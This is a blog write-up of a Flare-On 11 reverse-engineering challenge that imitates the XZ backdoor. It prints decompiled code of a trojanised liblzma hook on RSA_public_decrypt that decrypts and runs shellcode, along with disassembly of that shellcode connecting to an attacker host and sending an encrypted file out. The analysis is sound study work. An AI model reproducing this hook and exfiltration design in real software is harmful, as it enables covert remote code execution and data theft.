Flare on 11
Flare on 11#
Flare-On 11 is the 11th revision of the annual Flare-On challenge. Flare-on is famous for its difficult Windows oriented reverse engineering challenges. The CTF is one of my favourites.
This year was fun, and introduced challenges including a variety of platforms including Verilog and Smart Contracts.
I solved a total of 8 challenges out of 10. I got pretty far and I’m proud! :)
Challenges 5, 7 and 9 were interesting. Rest of them were pretty simple and I had a really manual way of going about them. In this blogpost, we’ll take a look at challenge 5 specifically.
Challenge 5: sshd#
The challenge begins by giving us a pretty huge tar file,
ssh_container.tar
. The name of the tar suggests it is some kind of file system.
We can take a look at what’s inside with tar xvf ssh_container.tar
, and it indeed is a full blown file system.
Taking a look at /root/flag.txt
, it turns out to be a false flag :p
If only…
Coredump#
I had to sift through the entire filesystem, but I couldn’t find anything interesting. After looking for a while, I found a coredump in one of the directories.
Running file
on this tells us that this is a coredump generated for the /sbin/sshd
,
a SSH daemon that’s also present on the filesystem.
We can go ahead and load this coredump along with the binary in gdb
.
Doing so tells us that the binary encountered a SIGSEGV
.
We can try printing a backtrace in gdb to find out exactly where the crash happened.
Interesting! liblzma.so.5.4.1
immediately brings back some memories! :p
liblzma.so.5.4.1#
This is a shared library that’s also present on the filesystem.
We can grab a copy and load it in Ghidra.
Looking around in Ghidra, I eventually stumbled across _INIT_1
.
void _INIT_1(void)
{
int iVar1;
long in_FS_OFFSET;
void *local_18;
long local_10;
local_10 = *(in_FS_OFFSET + 0x28);
local_18 = 0x0;
iVar1 = FUN_00108b10(&local_18,_strlen,_strlen + 0x10);
if (iVar1 == 0x0) {
FUN_001091b0(local_18,"RSA_public_decrypt", FUN_00109820,0x0);
if (local_18 != 0x0) {
free(local_18);
}
}
if (local_10 == *(in_FS_OFFSET + 0x28)) {
return;
}
// WARNING: Subroutine does not return
__stack_chk_fail();
}
RSA_public_decrypt
string looks interesting to us, especially in the context of the XZ backdoor article I linked to.
We can look inside FUN_00109820
and google for the strings inside.
Doing so leads us to kubo/plthook.
TL;DR - FUN_00109820
installs a hook into RSA_public_decrypt
,
and replaces the function with FUN_00109820
.
What this does is that it replaces the address to the actual function in the PLT of the binary with our hook’s address.
Thus, we can analyze the hook at FUN_00109820
.
Since we know that FUN_00109820
hooks RSA_public_decrypt
,
its function signature is exactly the same as RSA_public_decrypt
.
Knowing this, we can edit the function signature and relabel the variables to make the decompilation a bit more digestible.
int hook_RSA_public_decrypt(int flen,char *from,char *to,RSA *rsa,int padding) {
__uid_t _Var1;
int iVar2;
code *pcVar3;
void *__dest;
char *pcVar4;
long in_FS_OFFSET;
undefined local_108 [0xc8];
long local_40;
local_40 = *(in_FS_OFFSET + 0x28);
_Var1 = getuid();
pcVar4 = "RSA_public_decrypt";
if (_Var1 == 0x0) {
if (*from == -0x3abf85b8) {
FUN_001093f0(local_108,from + 0x4,from + 0x24,0x0);
__dest = mmap(0x0,DAT_00132360,0x7,0x22,-0x1,0x0);
pcVar3 = memcpy(__dest,&DAT_00123960,DAT_00132360);
FUN_00109520(local_108,pcVar3,DAT_00132360);
(*pcVar3)();
FUN_001093f0(local_108,from + 0x4,from + 0x24,0x0);
FUN_00109520(local_108,pcVar3,DAT_00132360);
}
pcVar4 = "RSA_public_decrypt ";
}
pcVar3 = dlsym(0x0,pcVar4);
iVar2 = (*pcVar3)(flen,from,to,rsa,padding);
if (local_40 == *(in_FS_OFFSET + 0x28)) {
return iVar2;
}
// WARNING: Subroutine does not return
__stack_chk_fail();
}
Looking at this decompilation, we can get a pretty good sense of what’s going on.
The hook only works if getuid
returns zero, i.e. if the root user is executing this.
This would make sense as the hook gets triggered by sshd
, which is most likely to be run by the root user.
The hook also checks if the from parameter is a very specific value -0x3abf85b8
(equivalent to 0xc5407a48
).
If so, It calls FUN_001093f0
and passes it local_108
along with what seems like offsets into the struct pointed to by from
.
We then map DAT_00132360 = 0xf96
size of memory,
and memcpy
those many bytes into the mapped memory region.
The code following it is interesting. FUN_00109520
receives local_108
,
our memory region pcVar3
and the size 0xf96
.
Then the memory region is called.
This is probably shellcode then! The two following invocations of FUN_001093f0
and FUN_00109520
are exactly the same as the previous invocations.
This is smelling of some kind of a decrypt-execute-encrypt code, where a shellcode in memory is decrypted, executed and then encrypted again to prevent reverse engineering.
But what is the cipher being used? Looking inside FUN_001093f0
, we see the following instruction in the disassembly:
0010942b MOV RDI,0x3320646e61707865
0010945d MOV RDI,0x6b20657479622d32
Converting these constants from hex to an ASCII string results in 3 dnapxe
and k etyb-2
.
If we consider that this is little endian, we can concatenate this and we get expand 32-byte k
.
This is Salsa20 or ChaCha20! This would mean that the offsets from + 0x4
and from + 0x24
and probably key and nonce!
The code then calls the actual RSA_public_decrypt
(notice the subtle trailing space) by locating it with dlsym
and executing it.
Summary so far#
We essentially have two pieces of the puzzle: Our RSA_public_decrypt
hook and the coredump. From the coredump, we can infer that we crashed sometime when checking the stack cookie:
From this location in the coredump, we can get enough information about the key and nonce to decrypt the shellcode.
But we’re still missing a part of the puzzle. Is this Salsa20 or ChaCha20? We can get to know this by looking at the suspected state initialization function. You’ll remember from the earlier disassembly where we found the expand 32-byte k
constant that the instruction look like this in the decompilation:
// "3 dnapxe"
uVar1[0x10] = 0x3320646e61707865;
// "k etyb-2"
uVar1[0x11] = 0x6b20657479622d32;
Converting these constants from hex to an ASCII string results in 3 dnapxe
and k etyb-2
.
If we consider that this is little endian, we can concatenate this
Since the two halves are adjacent in the cipher state, this must be ChaCha20! This is because the states of ChaCha20 and Salsa20 are initialized in different ways. Salsa:
ChaCha
Key and nonce recovery#
Now that we know that the algorithm is definitely ChaCha20, we know that the key is 32 byte and the nonce is 12 bytes.
Looking at the disassembly of the function calls in the hook, particulary where from + 0x4
and from + 0x24
are passed on,
001098c0 LEA R11,[RBP + 0x24]
001098c4 LEA R10,[RBP + 0x4]
we see that RBP
is being used to index into the struct. We can use this same fact and locate our key and nonce in the coredump. Remember that the ChaCha/Salsa key is 32 bytes and the nonce is 12 bytes. Hence,
This gives us the key = 943df638a81813e2de6318a507f9a0ba2dbb8a7ba63666d08d11a65ec914d66f
and the nonce = f236839f4dcd711a52862955
. Combined with the 0xf96
bytes of encrypted shellcode, this decrypts beautifully into x86 shellcode.
Shellcode analysis#
We can load this shellcode into Ghidra.
The shellcode calls a function FUN_00000dc2
.
This function involves some syscalls, and Ghidra doesn’t resolve them properly in the decompiler, so it is much better to look at the listing instead.
00000dcb LEA RSP=>local_16b0,[RSP + -0x1688]
00000dd3 MOV EAX,0xa00020f
00000dd8 MOV DX,0x539
00000ddc CALL FUN_0000001a
After the function prologue, this pushes some interesting values on the stack.
0x539
is 1337! The function FUN_0000001a
wraps two syscalls that connect to a socket. Based on the values passed to the function, I could infer that the connection is being made to host 10.0.2.15
(0xa00020f
) and port 1337
.
This must be the attacker’s machine.
Further in the original function, we encounter 4 recvfrom
syscalls that load data into various offsets on the stack. See an example:
00000de3 LEA RSI=>local_12a0,[RBP + -0x1278] ; buf points to RBP - 0x1278
00000dea PUSH 0x2d ; recvfrom
00000dec POP RAX
00000ded MOV EDI,EBX
00000def PUSH 0x20 ; load 32 bytes
00000df1 POP RDX
00000df2 XOR R10D,R10D
00000df5 XOR R8D,R8D
00000df8 XOR R9D,R9D
00000dfb SYSCALL
Based on the four syscalls, we can infer the size of data loaded at different offsets:
Address/Offset | Size in bytes |
---|---|
RBP - 0x1278 | 32 |
RBP - 0x1258 | 12 |
RBP - 0x1248 | dword ptr RBP - 0xf0 |
RBP - 0xc8 | 4 |
Looking further in the code,
00000e99 LEA RAX=>local_e8,[RBP + -0xc0]
00000ea0 LEA RDX=>local_12a0,[RBP + -0x1278]
00000ea7 LEA RCX=>local_1280,[RBP + -0x1258]
00000eae XOR R8D,R8D
00000eb1 CALL FUN_00000cd2
00000eb6 LEA RAX=>local_e8,[RBP + -0xc0]
00000ebd LEA RDX=>local_1170,[RBP + -0x1148]
00000ec4 MOV ECX,dword ptr [RBP + local_ec]
00000eca CALL FUN_00000d49
We can see that two function calls are being made, and the arguments to the function calls are the data that we receive from the network.
Taking a look at the first function
void FUN_00000cd2(void)
{
int iVar1;
undefined *in_RAX;
long i;
undefined *puVar2;
int *piVar3;
undefined8 in_R8;
puVar2 = in_RAX;
for (i = 0xc0; i != 0x0; i += -0x1) {
*puVar2 = 0x0;
puVar2 = puVar2 + 0x1;
}
FUN_00000a93();
*(in_RAX + 0xb0) = in_R8;
piVar3 = in_RAX + 0xb4;
iVar1 = FUN_00000f20();
*piVar3 = iVar1 + (in_R8 >> 0x20);
*(in_RAX + 0x78) = in_R8;
*(in_RAX + 0x40) = 0x40;
return;
}
The decompilation looks a bit off. Specifically, the in_RAX
business Ghidra seems to do. We can take care of this however, by modifying the function signature.
What the in_RAX
means is that the register being operated on, as it was passed in the function. We can take care of this by choosing custom storage for function parameters in Ghidra.
After specifying all of the function parameters, the decompilation looks a lot cleaner:
void FUN_00000cd2(undefined *param_1,undefined *param_2,undefined *param_3,undefined8 param_4)
{
int iVar1;
long i;
undefined *puVar2;
int *piVar3;
puVar2 = param_1;
for (i = 0xc0; i != 0x0; i += -0x1) {
*puVar2 = 0x0;
puVar2 = puVar2 + 0x1;
}
FUN_00000a93(puVar2,param_4,param_3,param_2,param_1);
*(param_1 + 0xb0) = param_4;
piVar3 = param_1 + 0xb4;
iVar1 = FUN_00000f20(param_1 + 0x68);
*piVar3 = iVar1 + (param_4 >> 0x20);
*(param_1 + 0x78) = param_4;
*(param_1 + 0x40) = 0x40;
return;
}
Seeing the *(param_1 + 0x40) = 0x40;
rang a lot of bells for me. This is the ChaCha20 state initialization function (again!). This means that the other function must be ChaCha20 encrypt function.
We can clean up the decompilation again and the result is pretty satisfying.
One other incredible gotcha in here that the ChaCha20 is standard except for the nothing-up-my-sleeve constant being used. Standard ChaCha20 uses expand 32-byte k
while the binary uses expand-32-byte K
(notice the uppercase K). This was really sneaky!
Extracting all the data#
Since we know that we receive 32 bytes and then 12 bytes over the TCP socket, this must be the key and the nonce for ChaCha20. The encrypted data must be the data at RBP - 0xec
.
One interesting thing to note is that the RBP
inside our shellcode is actually the RSP
in the GDB backtrace. This is because of the function prologue that happens when the shellcode gets called:
00000000 PUSH RBP
00000001 MOV RBP,RSP
The original function also opens and reads some content inside a file. This filename should be present at RSP - 0x1248
in the coredump. If we look in the GDB coredump, we can see that the filename doesn’t exist at RSP - 0x1248
but at RSP-0x1288
.
We know that the data inside this file is encrypted and sent over the network.
00000ee9 LEA RSI=>len,[RBP + -0x1148]
00000ef0 PUSH 0x2c
00000ef2 POP RAX
00000ef3 MOV EDI,EBX
00000ef5 MOV EDX,dword ptr [RBP + buff]
00000efb XOR R10D,R10D
00000efe XOR R8D,R8D
00000f01 XOR R9D,R9D
00000f04 SYSCALL
We can take a look at RBP - 0x1148
for the encrypted data then.
This is a pretty good indicator that the data is all offset by -0x40
. Thus we now know the locations of the key and nonce and the encrypted data as well. Let’s get all of the data. The length of the encrypted buffer must also be somewhere on the stack. Let’s just get the first 64 bytes for now.
Key, nonce and encrypted data.
Since we know that the ChaCha20 implementation is a bit non-standard, we can write our own implementation (or just let a LLM generate one for us :p)
Plugging all of the values into this implementation and running the script gives us our flag.
import struct
from typing import List
class ChaCha20Context:
def __init__(self):
self.state: List[int] = [0] * 16
self.keystream32: List[int] = [0] * 16
self.key: bytes = bytes(32)
self.nonce: bytes = bytes(12)
self.counter: int = 0
self.position: int = 0
def rotl32(x: int, n: int) -> int:
return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
def pack4(a: bytes) -> int:
return struct.unpack('<I', a)[0]
def unpack4(src: int) -> bytes:
return struct.pack('<I', src)
def chacha20_init_block(ctx: ChaCha20Context, key: bytes, nonce: bytes):
ctx.key = key
ctx.nonce = nonce
magic_constant = b"expand 32-byte K"
ctx.state[0] = pack4(magic_constant[0:4])
ctx.state[1] = pack4(magic_constant[4:8])
ctx.state[2] = pack4(magic_constant[8:12])
ctx.state[3] = pack4(magic_constant[12:16])
for i in range(8):
ctx.state[4 + i] = pack4(key[i*4:i*4+4])
ctx.state[12] = 0
ctx.state[13] = pack4(nonce[0:4])
ctx.state[14] = pack4(nonce[4:8])
ctx.state[15] = pack4(nonce[8:12])
def chacha20_block_set_counter(ctx: ChaCha20Context, counter: int):
ctx.state[12] = counter & 0xFFFFFFFF
ctx.state[13] = pack4(ctx.nonce[0:4]) + (counter >> 32)
def chacha20_block_next(ctx: ChaCha20Context):
ctx.keystream32 = ctx.state.copy()
def quarter_round(x, a, b, c, d):
x[a] = (x[a] + x[b]) & 0xFFFFFFFF
x[d] = rotl32(x[d] ^ x[a], 16)
x[c] = (x[c] + x[d]) & 0xFFFFFFFF
x[b] = rotl32(x[b] ^ x[c], 12)
x[a] = (x[a] + x[b]) & 0xFFFFFFFF
x[d] = rotl32(x[d] ^ x[a], 8)
x[c] = (x[c] + x[d]) & 0xFFFFFFFF
x[b] = rotl32(x[b] ^ x[c], 7)
for _ in range(10):
quarter_round(ctx.keystream32, 0, 4, 8, 12)
quarter_round(ctx.keystream32, 1, 5, 9, 13)
quarter_round(ctx.keystream32, 2, 6, 10, 14)
quarter_round(ctx.keystream32, 3, 7, 11, 15)
quarter_round(ctx.keystream32, 0, 5, 10, 15)
quarter_round(ctx.keystream32, 1, 6, 11, 12)
quarter_round(ctx.keystream32, 2, 7, 8, 13)
quarter_round(ctx.keystream32, 3, 4, 9, 14)
for i in range(16):
ctx.keystream32[i] = (ctx.keystream32[i] + ctx.state[i]) & 0xFFFFFFFF
ctx.state[12] = (ctx.state[12] + 1) & 0xFFFFFFFF
if ctx.state[12] == 0:
ctx.state[13] = (ctx.state[13] + 1) & 0xFFFFFFFF
assert ctx.state[13] != 0, "Counter overflow"
def chacha20_init_context(ctx: ChaCha20Context, key: bytes, nonce: bytes, counter: int):
chacha20_init_block(ctx, key, nonce)
chacha20_block_set_counter(ctx, counter)
ctx.counter = counter
ctx.position = 64
def chacha20_xor(ctx: ChaCha20Context, data: bytearray):
for i in range(len(data)):
if ctx.position >= 64:
chacha20_block_next(ctx)
ctx.position = 0
data[i] ^= (ctx.keystream32[ctx.position // 4] >> (8 * (ctx.position % 4))) & 0xFF
ctx.position += 1
# Example usage
if __name__ == "__main__":
nonce = bytes.fromhex("111111111111111111111111")
key= bytes.fromhex("8dec9112eb760eda7c7d87a443271c35d9e0cb878993b4d904aef934fa2166d7")
plaintext = bytes.fromhex("a9f63408422a9e1c0c03a8089470bb8daadc6d7b24ff7f247cda839e92f7071d")
ctx = ChaCha20Context()
chacha20_init_context(ctx, key, nonce, 0)
data = bytearray(plaintext)
chacha20_xor(ctx, data)
print("Dec:", data)
An alternate approach#
An alternate approach to this challenge in the stage 2 shellcode is to just patch the shellcode to connect to localhost, and then let the binary decrypt the data for you. This saves us some trouble of writing and figuring out of the ChaCha20 works.
It goes roughly like this:
- Patch the constant IP in the shellcode.
- Encrypt this data using the stage 1 ChaCha20 key and nonce.
- Patch liblzma with this shellcode
- Write a socket client that sends the key, nonce and the encrypted data we located.
- The data received should contain the flag.
This was a pretty fun challenge that is closely related to the XZ backdoor incident. I found this page really useful while analyzing the hook. It talks in details about how the hook is triggered and how the backdoor works and it’s really interesting! :)
Appendix#
A fun exercise I did post the challenge it to clean up the decompilation as much as possible. The result is pretty beautiful!
I found a C implementation of ChaCha20 online and downloaded its header file. We can parse this header file and import the data types in Ghidra to get a nice decompilation, especially of the key init function.
void chacha20::init(chacha20_context *ctx,uint32_t *key,uint32_t *nonce,uint64_t counter)
{
uint32_t uVar1;
int iVar2;
undefined8 uVar3;
ulong i;
undefined8 *puVar4;
*ctx->keystream32 = 0x0;
*(ctx->state + 0xe) = 0x0;
puVar4 = ctx->keystream32 + 0x2 & 0xfffffffffffffff8;
i = (ctx - puVar4) + 0xc0U >> 0x3;
for (; i != 0x0; i -= 0x1) {
*puVar4 = 0x0;
puVar4 = puVar4 + 0x1;
}
uVar3 = *(key + 0x2);
*ctx->key = *key;
*(ctx->key + 0x8) = uVar3;
uVar3 = *(key + 0x6);
*(ctx->key + 0x10) = *(key + 0x4);
*(ctx->key + 0x18) = uVar3;
*ctx->nonce = *nonce;
uVar1 = nonce[0x2];
*ctx->state = 0x3320646e61707865;
*(ctx->nonce + 0x8) = uVar1;
*(ctx->state + 0x2) = 0x6b20657479622d32;
ctx->state[0x4] = *key;
ctx->state[0x5] = key[0x1];
ctx->state[0x6] = key[0x2];
ctx->state[0x7] = key[0x3];
ctx->state[0x8] = key[0x4];
ctx->state[0x9] = key[0x5];
ctx->state[0xa] = key[0x6];
uVar1 = key[0x7];
ctx->state[0xc] = 0x0;
ctx->state[0xb] = uVar1;
ctx->state[0xd] = *nonce;
ctx->state[0xe] = nonce[0x1];
ctx->state[0xf] = nonce[0x2];
*ctx->nonce = *nonce;
uVar1 = nonce[0x2];
iVar2 = *ctx->nonce;
ctx->state[0xc] = counter;
*(ctx->nonce + 0x8) = uVar1;
ctx->state[0xd] = (counter >> 0x20) + iVar2;
ctx->counter = counter;
ctx->position = 0x40;
return;
}